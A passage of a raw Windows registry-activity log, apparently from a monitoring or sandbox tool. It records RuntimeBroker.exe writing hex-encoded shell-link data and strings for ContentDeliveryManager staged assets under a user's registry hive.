Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9e197554-ec71-4910 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000c7a7756d7c90db01c7a7756d7c90db01c7a7756d7c90db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000685a42b62000306637363761356334383531656536373464623539323931643763363839636261623039323566353633376639343632633336393535313437336263373233630000b20009000400efbe685a42b6685a42b62e00000000000000000000000000000000000000000000000000390eef00300066003700360037006100350063003400380035003100650065003600370034006400620035003900320039003100640037006300360038003900630062006100620030003900320035006600350036003300370066003900340036003200630033003600390035003500310034003700330062006300370032003300630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002657ae171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30663736376135633438353165653637346462353932393164376336383963626162303932356635363337663934363263333639353531343733626337323363000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007575686a6b6d716b00000000000000005092fec3dec97642a11a0e5697cb33258971d4b844edef11a3c8fafe8a32395a5092fec3dec97642a11a0e5697cb33258971d4b844edef11a3c8fafe8a32395ad2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100360031003300330030003700380033002d0032003900310032003500320035003600350031002d0031003200370038003500300038003800330034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f001e24000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06f98674-c7ef-4803 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000b27b796d7c90db01b27b796d7c90db01b27b796d7c90db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000685a42b62000643331323065343963313839363763363564313566376337663763393931396565376536613138646663323561376663343635303334363536623461636166620000b20009000400efbe685a42b6685a42b62e000000000000000000000000000000000000000000000000004e3aeb00640033003100320030006500340039006300310038003900360037006300360035006400310035006600370063003700660037006300390039003100390065006500370065003600610031003800640066006300320035006100370066006300340036003500300033003400360035003600620034006100630061006600620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002657ae171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64333132306534396331383936376336356431356637633766376339393139656537653661313864666332356137666334363530333436353662346163616662000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007575686a6b6d716b00000000000000005092fec3dec97642a11a0e5697cb33258a71d4b844edef11a3c8fafe8a32395a5092fec3dec97642a11a0e5697cb33258a71d4b844edef11a3c8fafe8a32395ad2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100360031003300330030003700380033002d0032003900310032003500320035003600350031002d0031003200370038003500300038003800330034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f001e24000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e4a769c7-0984-4629 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14aa5135-c1ed-42f7 = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03423d1b-2958-46dd = 9739706d7c90db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03423d1b-2958-46dd = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b60e0ae9-c5c6-4e19 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b60e0ae9-c5c6-4e19 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e624716d7c90db01e624716d7c90db01e624716d7c90db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000685a42b62000636332626461366366376233346439366463653361633437363631646532363038616335633165623936613363376434653662653938303163363838666335660000b20009000400efbe685a42b6685a42b62e000000000000000000000000000000000000000000000000001a91f300630063003200620064006100360063006600370062003300340064003900360064006300650033006100630034003700360036003100640065003200360030003800610063003500630031006500620039003600610033006300370064003400650036006200650039003800300031006300360038003800660063003500660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002657ae171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63633262646136636637623334643936646365336163343736363164653236303861633563316562393661336337643465366265393830316336383866633566000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007575686a6b6d716b00000000000000005092fec3dec97642a11a0e5697cb33258771d4b844edef11a3c8fafe8a32395a5092fec3dec97642a11a0e5697cb33258771d4b844edef11a3c8fafe8a32395ad2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100360031003300330030003700380033002d0032003900310032003500320035003600350031002d0031003200370038003500300038003800330034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f001e24000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03423d1b-2958-46dd RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14aa5135-c1ed-42f7 = 527e746d7c90db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9e197554-ec71-4910 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06f98674-c7ef-4803 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06f98674-c7ef-4803 = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e4a769c7-0984-4629 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9e197554-ec71-4910 = "\\\\?\\Volume{241E003F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\0f767a5c4851ee674db59291d7c689cbab0925f5637f9462c369551473bc723c" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\900daa0d-46aa-4fe9 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14aa5135-c1ed-42f7 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000043a0726d7c90db0143a0726d7c90db0143a0726d7c90db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000685a42b62000313366313938646139626539633737373231306239326663386632313366386161383961623662656439336137363463643637666337333830373566313831310000b20009000400efbe685a42b6685a42b62e00000000000000000000000000000000000000000000000000bd15f200310033006600310039003800640061003900620065003900630037003700370032003100300062003900320066006300380066003200310033006600380061006100380039006100620036006200650064003900330061003700360034006300640036003700660063003700330038003000370035006600310038003100310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002657ae171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31336631393864613962653963373737323130623932666338663231336638616138396162366265643933613736346364363766633733383037356631383131000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007575686a6b6d716b00000000000000005092fec3dec97642a11a0e5697cb33258871d4b844edef11a3c8fafe8a32395a5092fec3dec97642a11a0e5697cb33258871d4b844edef11a3c8fafe8a32395ad2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100360031003300330030003700380033002d0032003900310032003500320035003600350031002d0031003200370038003500300038003800330034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f001e24000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9e197554-ec71-4910 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e4a769c7-0984-4629 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e4a769c7-0984-4629 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\251670ff-6593-42a0 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\900daa0d-46aa-4fe9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\900daa0d-46aa-4fe9 = "\\\\?\\Volume{241E003F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4f625e8f04ae90ea71d7846afcf0accd1e3de01c8b5562c8aa88cdbdcad80bb0" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03423d1b-2958-46dd RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03423d1b-2958-46dd = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9e197554-ec71-4910 = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06f98674-c7ef-4803 = 6b5c7b6d7c90db01 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9e197554-ec71-4910 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cfd2bc69-4fc5-47ec RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cfd2bc69-4fc5-47ec = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cfd2bc69-4fc5-47ec = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fce69e6d7c90db01d120c36e7c90db01d120c36e7c90db01e4d40d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000685a42b62000646638623737323730343636353933366531643264366233396466336161336139653162313033386363636661616131653733306462653434373035363632320000b20009000400efbe685a42b6685a42b62e00000000000000000000000000000000000000000000000000b96fe700640066003800620037003700320037003000340036003600350039003300360065003100640032006400360062003300390064006600330061006100330061003900650031006200310030003300380063006300630066006100610061003100650037003300300064006200650034003400370030003500360036003200320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002657ae171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64663862373732373034363635393336653164326436623339646633616133613965316231303338636363666161613165373330646265343437303536363232000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007575686a6b6d716b00000000000000005092fec3dec97642a11a0e5697cb33259271d4b844edef11a3c8fafe8a32395a5092fec3dec97642a11a0e5697cb33259271d4b844edef11a3c8fafe8a32395ad2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100360031003300330030003700380033002d0032003900310032003500320035003600350031002d0031003200370038003500300038003800330034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f001e24000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03423d1b-2958-46dd = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000032d06e6d7c90db0132d06e6d7c90db0132d06e6d7c90db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000685a42b62000346636323565386630346165393065613731643738343661666366306163636431653364653031633862353536326338616138386364626463616438306262300000b20009000400efbe685a42b6685a42b62e00000000000000000000000000000000000000000000000000cee5f500340066003600320035006500380066003000340061006500390030006500610037003100640037003800340036006100660063006600300061006300630064003100650033006400650030003100630038006200350035003600320063003800610061003800380063006400620064006300610064003800300062006200300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002657ae171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c537461676564